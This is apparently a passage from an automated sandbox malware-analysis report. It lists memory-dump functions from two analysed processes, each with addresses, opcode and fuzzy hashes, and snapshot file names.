                                                    • Instruction ID: b6240e9690ef3028b9ffe91f849d668afec13e87a95ae2d3c21249b547c8fee2
                                                    • Opcode Fuzzy Hash: 61d6c34c27d2901b32150c26286465d556a8a6f847c373a013a64c7c5a4f5fad
                                                    • Instruction Fuzzy Hash: 2B018C35A1E28D8FEB16DBB488641987FB0EF46714F1641F7D054DB2A6D9386B48C780
                                                    Function 00007FFD9B894EBD Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24e40b4cd3ec413f5ace587c78abe00ce5cd01e6d03ca3f7e81b26aa49002981
                                                    • Instruction ID: 433d19a30451a64e5ee4c49cce0869afa5ae51ab307c1b22e96a071dfc283672
                                                    • Opcode Fuzzy Hash: 24e40b4cd3ec413f5ace587c78abe00ce5cd01e6d03ca3f7e81b26aa49002981
                                                    • Instruction Fuzzy Hash: AD012C35908A59CFCB55EB18C895A9977F1FB68310F4506DAD409D72A1DB34AE41CF80
                                                    Function 00007FFD9B890C50 Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction ID: d36249f8b8b8cfcbd95815f1244933d8a273a63c587a6b87793ec0b606a5f5c0
                                                    • Opcode Fuzzy Hash: 3911e99600fe100b0a4a7bc0bb547a85a0d20718d05ad519cb46b6244697557a
                                                    • Instruction Fuzzy Hash: 33015A34A1E2898FEB16DBA488A41987FB0EF16704F1641E7D454DB2A6D9386B448741
                                                    Function 00007FFD9B89291E Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction ID: 46210ba721b55378ddd7f3797381cbcb531c8190a2683e15068ceb93a91e0b4c
                                                    • Opcode Fuzzy Hash: 681dd678f55423f80fde8d03723e4bba8c8974644ff91c345b29d095a9e77cad
                                                    • Instruction Fuzzy Hash: E2F03130B1A50E8BEF79EB94C8A47F87761EB58311F1141B9C40EA22A1DE386A84CB40
                                                    Function 00007FFD9B890B77 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
                                                    • Instruction ID: 206be18c23f38dd525a492dab24fa65cb5314288f6118ac102f33633d90ccd54
                                                    • Opcode Fuzzy Hash: 66cf35f82717fc1cc5148c50076544c64e91237c2f0b7f92879392836b411a13
                                                    • Instruction Fuzzy Hash: 23F0E53525E689CFD741A738C8A16D4BFA0EF03209F4A11EAC489C7963D214585DCB41
                                                    Function 00007FFD9B8A498C Relevance: .0, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b8a0000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe0059857850188ca834bb9deb0c628796c0a12cce6edab5c56b557cbbeec22b
                                                    • Instruction ID: bad518acc27fe1c404c169eef8642165906cc6c703a683659a398b6251eb2c1c
                                                    • Opcode Fuzzy Hash: fe0059857850188ca834bb9deb0c628796c0a12cce6edab5c56b557cbbeec22b
                                                    • Instruction Fuzzy Hash: 96F08230B0954E8BEB28AB48D4506B932D0EB58351F1A4178E80EC31A7EE28EA428694
                                                    Function 00007FFD9B8BC929 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b8b1000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e08b2ed80283bc17af9e37fdc389c5836fb46e124ed9390d613211b971e33a2
                                                    • Instruction ID: 649d80ddc78763315b1cd4f9598a5fb85a2babc7086c09b8de3e7fd6cf4475e4
                                                    • Opcode Fuzzy Hash: 5e08b2ed80283bc17af9e37fdc389c5836fb46e124ed9390d613211b971e33a2
                                                    • Instruction Fuzzy Hash: EDF0657151E3C44FC3129B3888594547FB0EE1710535B05EBC0C9CB473D65A8987C312
                                                    Function 00007FFD9B8928F1 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction ID: ec5ad483bb3efd2e72b375a089abd2d58b36189eb7ab0fa2f9a96cd09fbe77f8
                                                    • Opcode Fuzzy Hash: 8cd932901108484ecbd1028138cfcf107a4298210c603351e4cb55657a5c86bf
                                                    • Instruction Fuzzy Hash: 3AF05E30B1A50E8BEFB8DBD4C8A47B83751EF58311F014275D44DA72F2CD29AF858A40
                                                    Function 00007FFD9B89708D Relevance: .0, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3cc0574f13164f8c648b6c951e47e50e2fb150cd5f795d5f2735c1e07c9ecb01
                                                    • Instruction ID: 9f6aacdc4b264e02c7040e5d4e17a3e8f7e84f57516213c08f7f68546743d208
                                                    • Opcode Fuzzy Hash: 3cc0574f13164f8c648b6c951e47e50e2fb150cd5f795d5f2735c1e07c9ecb01
                                                    • Instruction Fuzzy Hash: 4BE01212F5D54D46FBBCA3A858363B854C2EF9C704F4A41B9A05DC32D3DC482D800393
                                                    Function 00007FFD9B8A4028 Relevance: .0, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b8a0000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 14eacf85fc36d84b6225ec9303c483ee2927b39379cbff1c16b5e8d9a9b18844
                                                    • Instruction ID: 81e50d8d91bb1161ed710385f505e3febe495084d3de327410005deb460b5f9a
                                                    • Opcode Fuzzy Hash: 14eacf85fc36d84b6225ec9303c483ee2927b39379cbff1c16b5e8d9a9b18844
                                                    • Instruction Fuzzy Hash: F6E01261F0494F4AFB68DF48D4666BE6FB1EF58340F400139D119962E5DE3529838781
                                                    Function 00007FFD9B8A3BA0 Relevance: .0, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b8a0000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                    Function 00007FFD9B8906A5 Relevance: .0, Instructions: 13COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction ID: ad2f4052b067b61a18b6528d92cd979851e1deb705113a0321c9aa4fc3d8a01e
                                                    • Opcode Fuzzy Hash: e9c3a768ca4a15c833beaef444c98401a766ec53a568349f7243ec7c344a2d83
                                                    • Instruction Fuzzy Hash: F1C04C06F6B61F41FC3673EE98660ACA9406FDDF10FD70172D64D500E1AD4D22D54156
                                                    Function 00007FFD9B890848 Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction ID: f5afea7c36a37803931b794cf177333dd33fbab8ee6d41c43c70345e4a960aca
                                                    • Opcode Fuzzy Hash: 357baf54a18fbec0c068af6c39e917b84b8ac1f83436bfccbdac3267fcba0015
                                                    • Instruction Fuzzy Hash: B2C08C3461180C8FC908EB28C88480437A0FB0D200BC20090E009C7170E229DCC1C740
                                                    Function 00007FFD9B894015 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2494ff4e00647cbc1d938b85d85ac1ad3e757b8eefdb9edde44d40f9521c42ff
                                                    • Instruction ID: 2dfc560605b26d0cac48936497aa7444c3cc8704308f0ce130262db39d32803a
                                                    • Opcode Fuzzy Hash: 2494ff4e00647cbc1d938b85d85ac1ad3e757b8eefdb9edde44d40f9521c42ff
                                                    • Instruction Fuzzy Hash: 58C08C00F0D81A02F36AB3049431ABE08438B84244F8000B0E02E872CECD8C9A0202C7
                                                    Function 00007FFD9B8A94A4 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b8a0000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dee97278fb6f60426b32520255e7376c440a1e31f19a32535e9eeaaf09880287
                                                    • Instruction ID: 24cfb49a9699547c0ce1a0d475c24580eed30f809270aea6b1a7b4e322cb6531
                                                    • Opcode Fuzzy Hash: dee97278fb6f60426b32520255e7376c440a1e31f19a32535e9eeaaf09880287
                                                    • Instruction Fuzzy Hash: 35D0C930E0455D8EEBA4DB18C491F9972B2AF48304F6001F6900DE2289CF346E808B50
                                                    Function 00007FFD9B8906C8 Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction ID: 72f6aa97fb536398eea38e94ab17466f98f739a3eecab6c46c8b1349559f7bc5
                                                    • Opcode Fuzzy Hash: 7ae72c574db76d6c85465251d491aaf8998b500b8fcddd359cf8eba7dae60f7b
                                                    • Instruction Fuzzy Hash: F5B01200D6740F01EC2433FA08620A478406B4C600FC60070D80D50091A84D12940242
                                                    Function 00007FFD9B8B2830 Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b8b1000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 73667c955eb5ee136476d9db61411991cfc2cda8e4ccc81d79df83209702400c
                                                    • Instruction ID: 17c8dd8f472622085d102e3272749eb397a870b3b4eca9167adc36b74357d375
                                                    • Opcode Fuzzy Hash: 73667c955eb5ee136476d9db61411991cfc2cda8e4ccc81d79df83209702400c
                                                    • Instruction Fuzzy Hash: C8A00204DA794E11EC2832FA1D974947C505B8D155FD621A1EC08805D6E88E16ED0293

                                                    Non-executed Functions

                                                    Function 00007FFD9B8909B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000034.00000002.2384548263.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_52_2_7ffd9b890000_TyCvtMoTOGrwUAEyotiaCQmKvM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction ID: 8f7ace8b044e1fd3fa902ae7a00ee120a14cf4ab20fe5cd60dd930381f958173
                                                    • Opcode Fuzzy Hash: e04915cc82d030085f3452353eb915b34d207cd6d2f43e59546fef3118dd530a
                                                    • Instruction Fuzzy Hash: 1841CF87B1953685E31F33FC792A9ED5B84CF8527DB0842B7E16E8A0C75C88608393E5

                                                    Executed Functions

                                                    Function 00007FFD9B8C0BC5 Relevance: .4, Instructions: 436COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fba0c38bec7d2d0f41f58fec9ad385a3137dd740114394bd269ef46c0d8178df
                                                    • Instruction ID: 829bf2699fadc4e00aee8440819ce9ebabdbd7111063ac67116d9a56977a8c06
                                                    • Opcode Fuzzy Hash: fba0c38bec7d2d0f41f58fec9ad385a3137dd740114394bd269ef46c0d8178df
                                                    • Instruction Fuzzy Hash: 1AB1F161A6F69E0AE32D67580C930B07791EF86B45B1A83BEC9DBC7097DD18750382C2
                                                    Function 00007FFD9B890D78 Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b890000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5582e96a09630b04a2818a2a9cbe2038353d8b90d6e669c880a33026d2a0af2e
                                                    • Instruction ID: 1b154a4c24a8169d164568b2651587230be29ec36aa9c8d0b70d175a8a0b007f
                                                    • Opcode Fuzzy Hash: 5582e96a09630b04a2818a2a9cbe2038353d8b90d6e669c880a33026d2a0af2e
                                                    • Instruction Fuzzy Hash: 5591F571A18A9D8FEB89EB6888697A9BFE0FF59300F4001BFD049C72D6DBB81415C741
                                                    Function 00007FFD9B8ACED8 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: _
                                                    • API String ID: 0-701932520
                                                    • Opcode ID: 7cffa5ca7144de1bd05d41a99c5df11375036bbc88cb7bb5acd127cd90ebd86c
                                                    • Instruction ID: 859691d1d142bdfc5daf12f4c34ef90dee4c02c65752f3e91637dc8d9d6007ba
                                                    • Opcode Fuzzy Hash: 7cffa5ca7144de1bd05d41a99c5df11375036bbc88cb7bb5acd127cd90ebd86c
                                                    • Instruction Fuzzy Hash: 6F010412B1EA4E4FEBF4DB9898A52B92683EF9C300F1541B6D00ED729BDD28BD010780
                                                    Function 00007FFD9B8ACEFD Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: _
                                                    • API String ID: 0-701932520
                                                    • Opcode ID: 5b76005a4cb923dcd4ba9c03a5522b58e4fb27b401cd3dc373341dc24573c611
                                                    • Instruction ID: 5c4d36f7e88c99ac59dafae1b67d15b3e9f213ec7e8bc754e16375a34fe169ca
                                                    • Opcode Fuzzy Hash: 5b76005a4cb923dcd4ba9c03a5522b58e4fb27b401cd3dc373341dc24573c611
                                                    • Instruction Fuzzy Hash: 47F0F462B1DA4E5FDBF4CB8C9C916A523C2FF9C300B150076900DC728BE968FC014780
                                                    Function 00007FFD9B8A3AF9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M
                                                    • API String ID: 0-3664761504
                                                    • Opcode ID: 2a3c804da30aa7012f7911daf81a40d09a04422539034b65641b851e39802886
                                                    • Instruction ID: 8decbac5f41816ad35e8318589b22022548396668362d9245322756e02a4f705
                                                    • Opcode Fuzzy Hash: 2a3c804da30aa7012f7911daf81a40d09a04422539034b65641b851e39802886
                                                    • Instruction Fuzzy Hash: 3CF0306164F3D44FCB169A7488648557F60AE6721174A52EFC045CF1E3EA1DD886C741
                                                    Function 00007FFD9B8B5739 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M
                                                    • API String ID: 0-3664761504
                                                    • Opcode ID: 46efbf11690b83a8fa3a1f7afd35ea82b8c5f5257f751bb3bf3b14fec629ee7b
                                                    • Instruction ID: 9c1c9efa9a1d879a35c59a617fd63250d1d0f7c5081eec22b5eab92a9e13bd36
                                                    • Opcode Fuzzy Hash: 46efbf11690b83a8fa3a1f7afd35ea82b8c5f5257f751bb3bf3b14fec629ee7b
                                                    • Instruction Fuzzy Hash: BFF0306164F3D54FCB169A748868855BF60AE6720174A52EEC046CF2A3EA199886C741
                                                    Function 00007FFD9B8B9089 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: I
                                                    • API String ID: 0-3707901625
                                                    • Opcode ID: 129eb3d3ff204ca6500df296fdfa8af55b01df7b164495c77df5a88c6f1417a3
                                                    • Instruction ID: d74a9d4e0ef9954ea30dfcbdabaa96045ea708ebcff79d82c888d7e00ccd9317
                                                    • Opcode Fuzzy Hash: 129eb3d3ff204ca6500df296fdfa8af55b01df7b164495c77df5a88c6f1417a3
                                                    • Instruction Fuzzy Hash: A7E0ED6154F3D44FCB1A9B748869C553F70AE6721074B41DEC185CF5B3E6299949C701
                                                    Function 00007FFD9B8C1779 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: I
                                                    • API String ID: 0-3707901625
                                                    • Opcode ID: 2c2eb82684aa9f6d5ea08ea8de07b566c523520a3325251f70b3d793d86ab811
                                                    • Instruction ID: ad0a08ba5f9e8f75bb64d1cae9f7b79f31db6bfb264ffdbe6ef147426394d88d
                                                    • Opcode Fuzzy Hash: 2c2eb82684aa9f6d5ea08ea8de07b566c523520a3325251f70b3d793d86ab811
                                                    • Instruction Fuzzy Hash: 8CE09AA180F3C08FCB06EB3488698543FA0AE6B21078B40EFC085CF0B3E62D8949C701
                                                    Function 00007FFD9B8B9239 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8b1000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: I
                                                    • API String ID: 0-3707901625
                                                    • Opcode ID: 8b19f0b12432f763b4998f8e53716802abe65fb5149c90dcaae302e9d3ab622d
                                                    • Instruction ID: 3b94c10b6db2e024ea83d7aca2d00bdb06ab238b1ed86ec93d7a29c6d26db6b4
                                                    • Opcode Fuzzy Hash: 8b19f0b12432f763b4998f8e53716802abe65fb5149c90dcaae302e9d3ab622d
                                                    • Instruction Fuzzy Hash: 47E01A6194E7D44FCB56EB74887A8547FA0EE6B21178B40EEC185CF1B3E62D8849CB01
                                                    Function 00007FFD9B8A0A26 Relevance: .8, Instructions: 807COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e89476d275e42e5518137993475dbe27440fcaab98559f69b3b583db259e32b
                                                    • Instruction ID: 10d47f271b4721addfec1b4df1bc632e5c5f1e848719e8d6f7122e2008bf74cb
                                                    • Opcode Fuzzy Hash: 1e89476d275e42e5518137993475dbe27440fcaab98559f69b3b583db259e32b
                                                    • Instruction Fuzzy Hash: 7042C431B1D94E4FEBA8EB6884A16B477D2FF98310F1545B9D01EC32D6DE28AD82C741
                                                    Function 00007FFD9B8A169E Relevance: .7, Instructions: 687COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35894275a266fca23622f0cc77041a1d6b81f9793286ce92f31409f702746b58
                                                    • Instruction ID: c0f886136741bda8d79efe4914aa215dbe8d526ea0b2a20e76e0354f68bbd4fa
                                                    • Opcode Fuzzy Hash: 35894275a266fca23622f0cc77041a1d6b81f9793286ce92f31409f702746b58
                                                    • Instruction Fuzzy Hash: 2822C431B1D94E4BEBA8EB6884A16B477A2FF58300F1545B9D05EC32E7DE34B982C741
                                                    Function 00007FFD9B8A10C5 Relevance: .4, Instructions: 446COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_53_2_7ffd9b8a0000_Idle.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 89e63c1fb93844cc850ea787c1eb5b52fbdfca0b27d30141f169f423c58f28be
                                                    • Instruction ID: 2cff98e07a6cbd8d659755a907520c780826e6e579c8522cfef28fba4f8aadbf
                                                    • Opcode Fuzzy Hash: 89e63c1fb93844cc850ea787c1eb5b52fbdfca0b27d30141f169f423c58f28be
                                                    • Instruction Fuzzy Hash: 7CE1D331B1D91E4BEB68FB6884A167977A2FF99300F1545B9D04EC32E6DE28AD42C740
                                                    Function 00007FFD9B8A1061 Relevance: .4, Instructions: 397COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000035.00000002.2587647495.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
